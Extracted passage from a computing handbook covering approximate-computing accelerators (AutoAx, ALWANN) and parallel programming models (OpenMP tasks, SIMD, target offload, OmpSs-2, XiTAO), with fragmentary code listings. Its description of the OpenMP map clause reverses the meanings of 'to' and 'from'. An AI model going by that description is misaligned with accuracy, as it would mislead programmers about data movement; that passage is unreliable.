on the Cifar10 dataset. Note, for this analysis, multiple variants of the network
are considered, each having experienced a different level of pruning. The network
variants are highlighted in Fig. 16a. As can be seen in Fig. 21, with an increase in
the compression ratio, the model becomes increasingly sensitive to approximations.
Similar results are observed for the case of VGG11 network (see Fig. 22).
29 Approximate Computing Architectures 1063
Conclusions
Approximations can offer high energy savings while meeting user-defined quality
constraints. Besides the well-known techniques such as quantization (i.e., bit-width
reduction) and code simplification (e.g., reducing the number of iterations of a loop),
it is possible to approximate the functionality of circuits as well. The first part of
the chapter primarily focused on functional approximations, where approaches for
building approximate components such as adders and multipliers using both manual
and automated methods were introduced.
The following section focused on the construction of complex hardware accel-
erators using existing libraries of approximate components (such as EvoApproxLib,
lpAcLib, or GeAR). Two different types of accelerators were presented. For acceler-
ators with irregular structures such as image processing accelerators, an automatic
design space exploration and circuit approximation methodology AutoAx was
presented. This methodology replaces operations in an original accelerator with
approximate variants taken from a library of approximate components/circuits. To
accelerate the approximation process, QoR and hardware parameters are estimated
using computational models created using machine learning methods. It was shown
that AutoAx methodology generates approximate accelerators that offer high-
quality trade-offs between QoR and hardware parameters. The trade-offs are better
than the SoA approaches based on selecting components with the same error or
random selection.
The authors also focused on accelerators with a regular structure of processing
elements. The methodology ALWANN that allows us to approximate hardware accel-
erators of convolutional neural networks and optimize their energy consumption
for inference was introduced. Better energy savings with the same accuracy than
the other algorithms that employ retraining were achieved. The retraining typically
results in (i) approximation of significantly smaller networks due to scalability
issues (Mrazek et al. 2016; Zhang et al. 2015) or (ii) limited set of considered
approximate components (Sarwar et al. 2018).
Functional approximation is not the only approach to trade quality for energy
efficiency. Developers may also use other techniques such as quantization and
pruning. Toward this, a cross-layer optimization for neural networks was presented,
which systematically combines software-level and hardware-level approximation
techniques. The results showed that cross-layer optimization results in better
quality-efficiency trade-off. However, note that cross-layer approximate computing
is still an active area of research that is yet to uncover the ultimate potential of
approximate computing. One of the key hurdles toward achieving that is the lack
of sophisticated methodologies for evaluating the error masking and propagation
characteristics of approximations, which will enable the projection of approxi-
mations across layers and therefore enable fast design space exploration. From
approximations for DNNs’ perspective, as most of the approximate components
have irregular error distribution, there is a need for methodologies to adapt (retrain)
DNNs for such approximations. Apart from that, there is a dire need to explore and
determine the security of approximated DNNs against adversarial attacks.
1064 M. A. Hanif et al.
Acknowledgments This work was partially supported by the Czech science foundation project
21-13001S.
References
Bailey B, Martin G, Piziali A, Burton M, Greenbaum J, Hashmi K, Haverinen A, Lavagno
L, Meredith M, Murray B et al (2007) ESL design and verification: a prescription for
electronic system level methodology. Elsevier Science. https://books.google.cz/books?id=
raoeAQAAIAAJ
Češka M, Matyáš J, Mrazek V, Sekanina L, Vasicek Z, Vojnar T (2017) Approximating complex
arithmetic circuits with formal error guarantees: 32-bit multipliers accomplished. In: 2017
IEEE/ACM international conference on computer-aided design (ICCAD), pp 416–423
Chandrasekharan A, Soeken M, Große D, Drechsler R (2016) Approximation-aware rewriting of
AIGs for error tolerant applications. In: Proceedings of the 35th international conference on
computer-aided design, ICCAD’16. ACM, New York, pp 83:1–83:8
Chan WTJ, Kahng AB, Kang S, Kumar R, Sartori J (2013) Statistical analysis and modeling
for error composition in approximate computation circuits. In: 2013 IEEE 31st international
conference on computer design (ICCD), pp 47–53
Chang IJ, Mohapatra D, Roy K (2011) A priority-based 6t/8t hybrid sram architecture for
aggressive voltage scaling in video applications. IEEE Trans Circuits Syst Video Technol
21(2):101–112
Chen TH, Alaghi A, Hayes JP (2014) Behavior of stochastic circuits under severe error conditions.
it – Inf Technol 56(4):182–191
Chippa VK, Chakradhar ST, Roy K, Raghunathan A (2013) Analysis and characterization
of inherent application resilience for approximate computing. In: Proceedings of 50th
ACM/EDAC/IEEE design automation conference (DAC), pp 1–9
Choi J, Venkataramani S (2019) Approximate computing techniques for deep neural networks.
Springer, Cham, pp 307–329
Deb K, Pratap A, Agarwal S, Meyarivan T (2002) A fast and elitist multiobjective genetic
algorithm: NSGA-II. IEEE Trans Evol Comput 6(2):182–197
Du K, Varman P, Mohanram K (2012) High performance reliable variable latency carry select
addition. In: Proceedings of the conference on design, automation and test in Europe, DATE’12.
EDA Consortium, San Jose, pp 1257–1262
Esmaeilzadeh H, Sampson A, Ceze L, Burger D (2012) Architecture support for disciplined
approximate programming. In: ACM SIGPLAN notices, vol 47. ACM, pp 301–312
Gillani GA, Hanif MA, Krone M, Gerez SH, Shafique M, Kokkeler AB (2018) Squash: approxi-
mate square-accumulate with self-healing. IEEE Access 6:49112–49128
Gillani G, Hanif MA, Verstoep B, Gerez SH, Shafique M, Kokkeler AB (2019) Macish: designing
approximate MAC accelerators with internal-self-healing. IEEE Access 7:77142–77160
Gupta V, Mohapatra D, Park SP, Raghunathan A, Roy K (2011) IMPACT: imprecise adders for low-
power approximate computing. In: Proceedings of 17th IEEE/ACM international symposium
on low-power electronics and Design, pp 409–414
Hanif MA, Shafique M (2021) A cross-layer approach towards developing efficient embedded deep
learning systems. In: Microprocessors and microsystems p 103609
Hanif MA, Hafiz R, Hasan O, Shafique M (2017) Quad: design and analysis of quality-area
optimal low-latency approximate adders. In: DAC design automation conference 2017. ACM,
New York, pp 42:1–42:6
Hashemi S, Tann H, Reda S (2018) BLASYS: approximate logic synthesis using boolean matrix
factorization. In: Proceedings of the 55th annual design automation conference, DAC 2018, San
Francisco, 24–29 June 2018. ACM, pp 55:1–55:6. https://doi.org/10.1145/3195970.3196001
He K, Zhang X, Ren S, Sun J (2015) Deep residual learning for image recognition. CoRR
abs/1512.03385
29 Approximate Computing Architectures 1065
Hrbacek R, Sekanina L (2014) Towards highly optimized cartesian genetic programming: from
sequential via simd and thread to massive parallel implementation. In: Proceedings of the 2014
annual conference on genetic and evolutionary computation, GECCO’14. ACM, New York,
pp 1015–1022
Jiang H, Liu C, Liu L, Lombardi F, Han J (2017) A review, classification, and comparative
evaluation of approximate arithmetic circuits. J Emerg Technol Comput Syst 13(4):60:1–60:34
Judd P, Albericio J, Hetherington T, Aamodt T, Enright Jerger N, Urtasun R, Moshovos A (2018)
Proteus: exploiting precision variability in deep neural networks. Parallel Comput 73:40–51
Kulkarni P, Gupta P, Ercegovac M (2011) Trading accuracy for power with an underdesigned
multiplier architecture. In: 2011 24th internatioal conference on VLSI design, pp 346–351
Kyaw KY, Goh WL, Yeo KS (2010) Low-power high-speed multiplier for error-tolerant appli-
cation. In: 2010 IEEE international conference of electron devices and solid-state circuits
(EDSSC), pp 1–4
LeCun Y, Bengio Y, Hinton G (2015) Deep Learning. Nature 521(7553):436–444
Li C, Luo W, Sapatnekar SS, Hu J (2015) Joint precision optimization and high level synthesis
for approximate computing. In: Proceedings of the 52nd annual design automation conference,
DAC’15. ACM, New York, pp 104:1–104:6
Lotfi A, Rahimi A, Yazdanbakhsh A, Esmaeilzadeh H, Gupta RK (2016) Grater: an approximation
workflow for exploiting data-level parallelism in FPGA acceleration. In: 2016 design,
automation test in Europe conference exhibition (DATE), pp 1279–1284
Lu SL (2004) Speeding up processing with approximation circuits. Computer 37(3):67–73
Ma J, Hashemi S, Reda S (2019) Approximate logic synthesis using blasys. In: Proceedings of 1st
workshop on open-source EDA technology (WOSET), p 3
Mahdiani HR, Ahmadi A, Fakhraie SM, Lucas C (2010) Bio-inspired imprecise computational
blocks for efficient vlsi implementation of soft-computing applications. IEEE Trans Circuits
Syst I: Regul Pap 57(4):850–862
Mazahir S, Hasan O, Hafiz R, Shafique M (2017a) Probabilistic error analysis of approximate
recursive multipliers. IEEE Trans Comput 66(11):1982–1990
Mazahir S, Hasan O, Hafiz R, Shafique M, Henkel J (2017b) Probabilistic error modeling for
approximate adders. IEEE Trans Comput 66(3):515–530
Mishchenko A, Chatterjee S, Brayton R (2006) Dag-aware aig rewriting: a fresh look at combina-
tional logic synthesis. In: 2006 43rd ACM/IEEE design automation conference, pp 532–535
Mishra AK, Barik R, Paul S (2014) iact: a software-hardware framework for understanding the
scope of approximate computing. In: Workshop on approximate computing across the system
stack (WACAS)
Mohapatra D, Chippa VK, Raghunathan A, Roy K (2011) Design of voltage-scalable meta-
functions for approximate computing. In: Design, automation & test in Europe conference
& exhibition (DATE), 2011. IEEE, pp 1–6
Momeni A, Han J, Montuschi P, Lombardi F (2015) Design and analysis of approximate
compressors for multiplication. IEEE Trans Comput 64(4):984–994
Mrazek V, Sarwar SS, Sekanina L, Vasicek Z, Roy K (2016) Design of power-efficient approximate
multipliers for approximate artificial neural networks. In: Proceedings of the 35th international
conference on computer-aided design, ICCAD’16. ACM, New York, pp 81:1–81:7
Mrazek V, Hrbacek R, Vasicek Z, Sekanina L (2017) Evoapprox8b: library of approximate adders
and multipliers for circuit design and benchmarking of approximation methods. In: Design,
automation test in Europe conference exhibition (DATE), 2017, pp 258–261
Mrazek V, Vasicek Z, Hrbacek R (2018) The role of circuit representation in evolutionary design
of energy-efficient approximate circuits. IET Comput Digit Tech 12(4):139–149
Mrazek V, Hanif MA, Vasicek Z, Sekanina L, Shafique M (2019a) AutoAx: an automatic design
space exploration and circuit building methodology utilizing libraries of approximate compo-
nents. In: Proceedings of the 56th annual design automation conference 2019. Association for
Computing Machinery, New York
1066 M. A. Hanif et al.
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1070
Hardware Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1070
Constructs in Parallel Programming Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1071
Taxonomy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1072
The OpenMP Programming Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1074
The Worksharing Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1076
The Tasking Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1077
SIMD Support in OpenMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1079
The Accelerator Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1085
The OmpSs-2 Programming Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Advanced Dependency System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Exploiting Structured Parallelism on Many-Core Processors . . . . . . . . . . . . . . . . . . . . . . . 1091
OmpSs-2 NUMA Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1093
The XiTAO Programming Model and Runtime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1096
Explicit DAG Programming in XiTAO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1096
Software Topologies and Locality-Aware Programming . . . . . . . . . . . . . . . . . . . . . . . . . . 1098
M. N. Farooqi
Leibniz Supercomputing Centre of the Bavarian Academy of Sciences and Humanities, Munich,
Germany
e-mail: [email protected]
M. Abduljabbar
The Ohio State University, Columbus, USA
e-mail: [email protected]
M. Pericàs ()
Chalmers University of Technology, Gothenburg, Sweden
e-mail: [email protected]
V. Beltran · X. Teruel · R. Ferrer · X. Martorell
Barcelona Supercomputing Center, Barcelona, Spain
e-mail: [email protected]; [email protected]; [email protected]; [email protected]
Abstract
Keywords
Introduction
Hardware Models
Taxonomy
Parallel programming models are highly dependent on underlying hardware and are
usually developed for specific hardware. Two main hardware features that provide
a basis for programming models’ classification are memory and heterogeneity in
compute hardware. On the basis of memory, parallel programming models can be
classified into three types: shared memory models, distributed memory models,
and distributed shared memory models. While based on heterogeneity of compute
hardware, accelerator models were developed. A hybrid approach can be taken to
combine some of these models depending on the machine model. Figure 1 shows a
30 Parallel Programming Models 1073
Fig. 1 Taxonomy of parallel programming models showing the levels of a parallel computer
system and associated programming models highlighted in green boxes
taxonomy of the parallel programming models with examples. Next, these models
are described separately.
Distributed memory models: These models are used to write programs for
execution on distributed memory systems where data among processes is communi-
cated through synchronous/asynchronous messages. Unlike shared memory models,
distributed memory models solve the problem of data races and can scale beyond
a single node, thus making it suitable for large problems that can’t fit in a single
machine. Message Passing Interface (MPI) is an example of a distributed memory
model.
Heterogeneous models: These are the programming models for accelerators. Most
of the programming models in this category are developed by hardware vendors that
are specific for their devices, e.g., CUDA, OpenCL, and SYCL.
1074 M. N. Farooqi et al.
Review Board 2013) introduced the offloading model, allowing the programmers
to take advantage of the accelerator devices attached to the SMP architecture. All of
these additions improved the way programmers can express the inherent parallelism
of their application. The current version, i.e., OpenMP 5.x (OpenMP Architecture
Review Board 2020), has not included any new sub-model per se, but it improves
certain features of the existing ones. Also, the major contribution of the latest
version is based on the standardization of the interaction between the OpenMP
runtime and third-party tools, including performance and debugging tools.
The OpenMP execution model is based on the creation of successive parallel
regions separated by sequential regions. That is, it allows to annotate code regions
that will be executed by multiple threads, while non-annotated code regions will be
executed only by the initial thread. Within a parallel region, programmers can also
define certain code subregions that can distribute the associated work among the
multiple threads participating in it. Perhaps one of the most used OpenMP features
is the for directive (do in Fortran); this directive allows dividing the iteration space
associated with a loop among the different threads participating in the region.
Additionally, a parallel region can also be used for task execution. The specifica-
tion defines safe points in the execution of the program where threads can look for
new work to execute from the ready task pool. A fairly common use case can create
a parallel region with multiple threads, restrict the execution to a single thread, and
instantiate multiple tasks. Although the encountered code executes with only one
thread, any member of the team could be a candidate to execute the instantiated
tasks. We can refer to this scenario as one producer, i.e., one thread creates all the
tasks, and multiple consumers, i.e., all threads participating in the parallel region
execute these tasks.
Apart from these two programming sub-models, both based on the fork-join
design pattern, OpenMP additionally offers a complementary pattern that allows
code vectorization using the SIMD directives. Although this parallel approach
can exist on its own, it is usually combined with other directives allowing the
loop parallelization. Thus, the first level of parallelism divides the work between
threads, while a second level exploits the internal parallelism offered by the vector
instructions of the processor.
Once the OpenMP execution model has been introduced, it is necessary to pay
attention to its memory model. OpenMP defines a shared memory model of relaxed
consistency. This means that all the threads can access the whole memory space
(at least the host memory space; this situation changed once introduced the offload
sub-model) and read or write any shared variable. Even so, the model offers us
a “relaxed” consistency. This means that not all threads see or make visible the
changes they do at any time but at specific points of the executions. To guarantee
consistency, the model defines the flush operations (also related to the flush
directive), and it includes this operation implicitly in those constructs that may
require it. For example, in the execution of an OpenMP barrier, programmers have
the guarantee that all the changes made by the different threads of the team are
visible to the rest of the members (and, therefore, that any thread can see the
changes made by the rest of the team). The definition of these flushes facilitates
1076 M. N. Farooqi et al.
the programming of the application, making the use of this model transparent (in
most cases) to the programmer.
The memory model changes when using devices (i.e., in the offload sub-model).
In these cases, it will be the programmer who will define the correct order, in
terms of data movements, between the host and the device, and vice versa. For this
purpose, the map clause is available in the language. Examples of its use will be
shown in section “The Accelerator Model”.
OpenMP has been adopted by a great variety of C, C++, and Fortran compilers,
from the major industry/commercial compilers, like Intel, IBM, Fujitsu, Texas
Instruments, or Oracle; to other pure open-source approaches, like the GNU
Compiler Collection, Mercurium, Rose, or OpenUH compilers. In recent years, the
emergence of hybrid approaches (between open-source and commercial initiatives)
of the LLVM-based compilers has also been observed, like AMD, Clang, Flang, or
PGI. Some of the compilers mentioned above have academic purposes and are used
as rapid prototyping mechanisms for the study of new proposals for the standard.
This is the case of the Mercurium compiler, used for the implementation of the
OmpSs/OmpSs-2 programming model (see section “The OmpSs-2 Programming
Model”).
Concerning the HPC community, the standard has been adopted in many
different ways: from programming exclusively using OpenMP for small problem
size workloads (still requiring multi-threaded capabilities) to hybrid approaches in
the form of MPI + OpenMP, where it is used as a second level of parallelization,
exploiting the intra-node parallelism. Since its version 4.0, it is also considered as a
programming mechanism for accelerator devices attached to the host.
runtime will dynamically assign each of them among all the threads participating in
the parallel region (schedule policy). Lines 4–6 contain the original user code.
A second parallelization approach is possible when the code has several blocks
that can be executed concurrently. In this case, there is not an iteration space that
can be distributed among threads, but each of these blocks can still be assigned to a
different thread exploiting the program parallelism.
Listing 2 shows a region of code including function calls that can potentially
be executed in parallel. The annotation of the code begins with the opening of the
parallel region (line 1), the opening of the context of the sections construct (line
3), and the demarcation of each of these sections (lines 5, 7, and 9).
The previous section has shown the parallelization of code blocks using OpenMP.
This section still focuses on task parallelism but uses task-related directives. As will
be shown, OpenMP tasks are a generalization of the work-sharing sections construct
providing greater expressiveness and interesting semantics to use in parallel codes.
1078 M. N. Farooqi et al.
A task is a work unit that contains (1) user code; (2) the data associated with
that code; and (3) a set of internal variables that will determine its behavior. In a
way, programmers can use tasks to implement code where sections were used. The
code in Listing 3 shows a direct translation of the code that was previously shown
in Listing 2. In this new example, the parallel region is still present, but instead of
using the work-sharing sections construct, a single directive is inserted. It
means that just one thread will take care of creating all the tasks. It is important
to note that although one single thread creates tasks, all the threads participating in
the team will collaborate in its execution. The parallelization of the source code is
completed by including the task annotations (lines 5, 7, and 9).
Coming back to one of the restrictions mentioned before, the number of sections
should be known at compile time. This restriction does not apply when using tasks.
The code in Listing 4 shows the initialization of a list of elements by using a while
loop (lines 7–12). In this case, loop work-sharing cannot be used (since it requires
the canonical form of a for loop, where the number of iterations must be known at
the entry point), and it is also not possible to use the sections construct, due to
the restriction previously mentioned. Using tasks, however, is a fairly common and
natural pattern for this case.
8 #pragma omp t a s k d e p e n d ( o u t : l i s t )
9 i n i t i a l i z e ( l i s t −>elem ) ;
10
11 l i s t = l i s t −> n e x t ;
12 }
13
14
15
16 l i s t = begin ;
17
18 while ( l i s t ! = NULL) {
19 #pragma omp t a s k d e p e n d ( i n o u t : l i s t )
20 compute ( l i s t −>elem ) ;
21
22 l i s t = l i s t −> n e x t ;
23 }
24 }
25 }
Tasks also require certain synchronization points. In the example above, to start
the second while loop, the initialization tasks must have completed. This is
achieved with the taskwait directive (line 14), which allows to wait for all the
tasks created up to that moment.
Despite the correct use of the taskwait directive, OpenMP offers other
mechanisms that allow defining the correct order of task executions: dependencies.
The depend clause allows to annotate a task according to the data it is using. In
this way, the OpenMP runtime will take care of computing all the possible data
dependencies between them. The code in Listing 5 uses this new synchronization
approach. The code does not need the taskwait directive anymore. The cor-
responding annotations on the task side have been added (lines 8 and 19). This
modification not only guarantees the correct order but also achieves a finer grain of
synchronization. That is, to compute an element of the list (second while loop,
line 19), it is not required that the initialization of all the elements in the list (first
while loop) has completed, but it is enough to wait only for the element that is
currently being computed.
The depend clause supports several types of modifiers. The most common are
in (read), out (write), and inout (update), which allow the usual compute of
dependencies: RaW (Read-after-Write), WaR (Write-after-Read), and WaW (Write-
after-Write).
To address this issue, compiler vendors offer different options. One option is a set
of annotations so the user can state the facts that the compiler cannot prove. These
annotations come in the form of vendor-specific pragma constructs or assume
intrinsics. Via the reports of the compiler, a user can identify what is actually
preventing vectorization. If the fact is true but cannot be proved by the compiler,
some form of annotation can enable vectorization again. This is a form of semi-
automated vectorization on which the bulk of the vectorization is still handled by the
compiler. For instance, it is possible to annotate the alignment of a memory buffer
as a fact to be used by the compiler. Some architectures impose memory alignment
constraints, or can use more efficient instructions, when loading or storing vectors
from or to memory. Annotations can be pushed further so the user can fully override
correctness checks. For instance, the user can state that it is correct to vectorize a
loop, irrespective of the actual fact. In general, these kinds of annotations are often
not portable between compilers.
Another option is to use architecture-specific compiler intrinsics. Those give the
maximum control to the user but at a higher programming effort. They are in practice
closer to assembly programming because those intrinsics often offer a one-to-one
correspondence to the corresponding SIMD instruction. This is a form of manual
vectorization as the compiler offers little assistance and the user needs to take all
the decisions. Hardware vendors push for standardized low-level intrinsics so they
can be used in different compilers, but those intrinsics are obviously non-portable
between architectures.
Listing 7 is an example of a SAXPY kernel. And Listing 8 is an example
of its manual vectorization using RISC-V Vector Extension intrinsics (RISC-V
Community 2021). Compiler intrinsics provide a lot of control. This example shows
how the programmer has to make explicit a number of low-level details when
using intrinsics: vector loads (vle32_v_f32m8), vector stores (vse32_v_-
f32m8), and even a contraction of the addition and multiplication using a specific
float-multiply operation (vfmacc_vf_f32m8). Another detail of the RISC-V
architecture that pervades the code when using intrinsics is the need to request a
vector length (vsetvl_e32m8) that is then passed to all the intrinsics and also
used to advance the loop.
4 float * y ) {
5 for ( int i = 0 ; i < n ; ) {
6 s i z e _ t vl = vsetvl_e32m8 ( n − i ) ;
7 v f l o a t 3 2 m 8 _ t vx , vy ;
8 vx = v l e 3 2 _ v _ f 3 2 m 8 (&x [ i ] , v l ) ;
9 vy = v l e 3 2 _ v _ f 3 2 m 8 (&y [ i ] , v l ) ;
10 vy = v f m a c c _ v f _ f 3 2 m 8 ( vy , a , vx , v l ) ;
11 vse32_v_f32m8 (&y [ i ] , vy , v l ) ;
12 i += v l ;
13 }
14 }
SIMD Loops
OpenMP SIMD, available as of version 4.0, provides a mechanism for semi-
automated vectorization. OpenMP pragmas act as annotations with the added benefit
that they are portable between compilers and architectures.
The main construct that enables SIMD support in OpenMP is the simd directive.
This directive must immediately go before a loop and states that the iterations of
the loop can be concurrently executed using SIMD instructions. A SIMD loop is
executed by grouping the iterations of the original loop into chunks of consecutive
iterations. The iterations in a single chunk are executed concurrently via SIMD
instructions.
When using the simd directive, the compiler does not have to check about
the correctness of the vectorized loop. This is an important distinction with
some approaches that use annotations: in those the compiler adds to the facts,
it could prove the facts provided by the user. In OpenMP the compiler assumes
the programmer has assessed the validity of concurrent execution using SIMD
instructions. Under these circumstances a compiler can skip a large part of the
correctness analysis. However, there are still a number of decisions to be taken when
vectorizing the code. OpenMP SIMD gives a lot of flexibility and control to the user
to describe many facts about the loop being vectorized. This is done via a number
of clauses.
• simdlen. The user can specify the preferred size of the chunk. This roughly
corresponds to the vector length. Some architectures, mostly due to historical
reasons, provide different vector lengths, and it may be necessary to specify the
precise length due to their memory access patterns. Some loops may have slightly
better performance when the chunk is reduced.
• safelen. Section “Vectorization, Intrinsics, and Semi-automatic Vectoriza-
tion” has mentioned that loop-carried dependences must fit a vector. In OpenMP
SIMD terms, this means that an iteration of a chunk cannot generate a value that
is used by other iterations of the same chunk. A simple example is a loop that does
a[i+5] = a[i] + 1;. If we use a vector longer than 5 elements, a chunk
can be concurrently doing a[5] = a[0] + 1; a[10] = a[5] + 1;
which gives unpredictable semantics to the value of a[5].
30 Parallel Programming Models 1083
How values evolve in a loop allows the compiler to emit more efficient code for
the purpose of vectorization.
Listing 9 shows the loops in Listing 6 explicitly annotated with the simd
directive. The directives inform the compiler that it is safe to vectorize the loops.
Function Vectorization
OpenMP SIMD imposes a number of constraints to a simd loop, for instance, not
all the OpenMP constructs can be used in the body of the loop. However, calls to
other functions in the loop body are allowed. This opens a number of possibilities
when vectorizing code that makes function calls.
Traditionally, a loop that needs to call a function had the code of the invoked
function inlined. This frees the vectorization algorithm of having special support for
function calls. However it may not always be possible to inline functions, especially
if they come from optimized libraries.
OpenMP SIMD allows the creation of SIMD versions of existing functions so
they can be called from the body of a simd loop. This can be done using the
declare simd directive. Calling a SIMD function from a SIMD loop means
in general the scalar types of the parameter and return of the function are replaced
by vector values.
Similar to the simd directive, OpenMP SIMD provides a lot of control regarding
the SIMD function via clauses. These clauses are applied to the parameters of the
function.
With the advent of heterogeneous platforms, mainly consisting of SMP cores and
Graphics Processing Units (GPUs), and the possibility to use the latter for com-
puting, OpenMP had the need to improve programmability on these environments.
OpenMP selected to incorporate a new directive, the target extension to drive the
code generation towards accelerators.
1086 M. N. Farooqi et al.
There are two main uses of the target directive: (i) provide a hint on which code
regions should be translated for the accelerators and executed there [if possible] and
(ii) provide a hint on extended code regions which must have a collection of data
placed in the accelerator memory. Listings 12 and 13 show these two main uses.
When working with accelerators, the execution environment must ensure that
data is in the address space of the target accelerator. OpenMP achieves this goal by
allowing the expression of the variables that need to be moved in and out of the
accelerator memory: the map clause.
The map clause is used in both target and target data directives. It accepts a
qualified list of symbols. For each one, data transfers are implemented following
the qualifiers:
• from: data is moved to the accelerator prior to the execution of the code region.
• to: data is moved from the accelerator back to the host memory space, after the
execution of the code region.
• tofrom: data is moved before the execution of the task to the accelerator and back
after the execution.
Additional qualifiers (alloc, release, delete) allow to manage the mapping of the
data directly on the accelerator.
Listing 14 shows the list traversal program, annotated to spawn work on an accel-
erator. The accelerated work is the initialization (lines 8–9) and the computation
(lines 17–18) associated with each list element. The target directive behaves as a
task, and it can also be provided with the data directionality hints, to implement a
dataflow graph.
30 Parallel Programming Models 1087
OmpSs-2 is a data-flow programming model that extends and refines the original
tasking model proposed in OmpSs (Duran et al. 2011) to cope with the increase in
size, complexity, and heterogeneity of future Exascale systems. To that end, OmpSs-
2 provides several advanced features, including a powerful dependency system that
supports dependencies across different nesting levels and advanced dependency
types such as concurrent, commutative, and task reductions; support to exploit
large many-core processors, as well as NUMA systems. It is worth noting that all
these features, implemented in the Mercurium compiler and Nanos6 runtime system,
have been designed to be freely combined to ease the development of complex
applications.
hand, it allows the runtime to control dependencies at a fine grain that until now was
only possible using a single domain of dependencies.
The combination of nesting and dependencies has three aspects that can be
improved:
• The presence of the taskwait directive delays the completion of the enclosing task
and thus the release of the system or user-level thread and its stack.
• A task with subtasks cannot release incrementally its own dependencies and
those of its subtasks. Instead they are all released together once the task and
all of its subtasks have finished.
• The presence of elements in the depend clause that are only needed by subtasks
defers task start even when only subtasks need to be deferred.
Weak Dependencies
On a parent task, each element of the depend clause may be needed only by the task
itself, only by its subtasks, or by both. The elements that are only needed for the
subtasks only serve as a mechanism to link the outer domain of dependencies to the
inner one. In this sense, allowing these elements to defer the execution of the task
is unnecessary, since the task does not actually perform any conflicting accesses by
itself.
For this reason it has been proposed to extend the depend clause with three
additional dependency types: weakin, weakout, and weakinout. Their semantics are
analogous to the ones without the weak prefix. However, the weak variants indicate
that the task does not perform by itself any action that requires the enforcement of
the dependency. Instead those actions might only be performed by any of its nested
subtasks. Any subtask that might directly perform those actions needs to include the
element in its depend clause in the non-weak variant. In turn, if the subtask delegates
the action to a subtask, the element must appear in its depend clause using at least
the weak variant. Weak variants do not imply a direct dependency and thus do not
defer the execution of tasks. Their purpose is to serve as linking point between
the dependency domains of each nesting level. Weak dependencies, combined with
the fine-grained release of dependencies, merge the inner dependency domain of
a task into that of its parent. Since this happens at every nesting level, the result is
1090 M. N. Farooqi et al.
equivalent to an execution in which all tasks had been created in a single dependency
domain. For more details please refer to Perez et al. (2017).
• concurrent: The concurrent dependence type behaves as the inout type with
respect to in, out, and inout types, but has the particularity that no dependencies
are enforced over other sibling tasks that define a concurrent type over the same
memory reference. This dependency type has been introduced in OpenMP 5.1 as
inoutset
• commutative: The commutative dependence type behaves as the inout type with
respect to in, out, and inout types. It also enforces a dependence over other
sibling tasks that define a commutative type over the same memory reference, but
this dependence allows any order of execution between those tasks (as opposed
to creation order). Any permutation ordering of those tasks annotated with
commutative is correct, as long as only one of those tasks is executed at a time.
This dependency type has been introduced in OpenMP 5.0 as mutex_inoutset
• reduction: As far as the interaction between dependence types is concerned, the
reduction type behaves just as the concurrent type. The difference between them
is that the last task annotated with a reduction clause will also be responsible for
computing a reduction, but this has no implications from the point of view of the
dependence model.
It is worth mentioning that reductions are also supported with array types (Pallares
et al. 2019). To that end, the Nanos6 runtime system provides all the logic required
to transparently manage private data copies and dynamically reduce them when
they are required. This provides a seamless integration of reductions with other
dependency types, without requiring any explicit scoping or global synchronization
like in OpenMP reductions. Listing 16 shows how array reductions can be used to
calculate the histogram of a set of images. In this example, the task loop construct is
used to parallelize with tasks the inner loop, which computes the histogram of one
single image. However, the use of array reductions enables the runtime system to
process images belonging to different iterations in parallel.
There are many situations where the problem size per core is not optimal,
jeopardizing the benefits of using tasks:
A worksharing task is like a regular task in this sense, and the synchronization
is done through data dependencies or explicit synchronization points. Note that
the data dependencies of the worksharing tasks are released when the last chunk
is finished by the thread that runs that last chunk. As a worksharing construct,
the iteration space of the for-loop is partitioned in chunks of chunksize size. The
key point is that these chunks do not have the usual overheads associated with a
task – such as memory allocation and dependency management. To run a chunk, a
thread only needs the boundaries of that chunk and the data environment, much like
worksharing constructs. So, in summary, a worksharing task can be run in parallel
by multiple threads, better amortizing the task management overheads. Moreover,
worksharing tasks enlarge the set of granularities that deliver good performance. In
scenarios where only a few tasks are created and if these are not enough to keep all
the resources busy, the use of worksharing tasks mitigates the lack of parallelism.
offers a lot of possibilities. For instance, Listing 18 shows (1) how to spread data
among all the available NUMA nodes (lines 6–8), (2) how to allocate all the data
in a single NUMA node (lines 10–15), and (3) how to distribute data using a block-
cyclic policy among all the available NUMA nodes (lines 17–20).
the location of accesses. If either the parent or the predecessor of a created task has
information about the location of an access, the runtime does not query the directory.
In practice, this means that only the first task that accesses a data region performs a
query, and all the rest are able to get it by propagation, reducing the number of
queries up to a few orders of magnitude. Thanks to the previous optimizations,
the overhead of the data-tracking mechanism is negligible when using adequate
granularities.
Evaluation (Maroñas et al. 2021) has shown that the approach is able to
outperform other state-of-the-art approaches such as the use of numactl across
several different benchmarks in different platforms, being able to reach the optimal
speedup in several of these benchmarks. Specifically, Nanos6 has been shown to
obtain up to 2× speedup in a machine with two NUMA nodes and up to 7.1×
speedup in a machine with 8 NUMA nodes, compared to the performance of running
with a single NUMA node.
The XiTAO API has two levels. At the lower level is the explicit DAG interface,
which allows to construct computational DAGs by creating new task assemblies
(TAOs) and connecting them with edges. At the higher level lies the data-parallel
interface which is described later.
XiTAO provides low-level constructs to describe TAO objects as C++ classes
and interconnect them into a TAO-DAG. Listing 19 shows simplified structures of
the base AssemblyTask class, a minimal TAO class, and the basic XiTAO API.
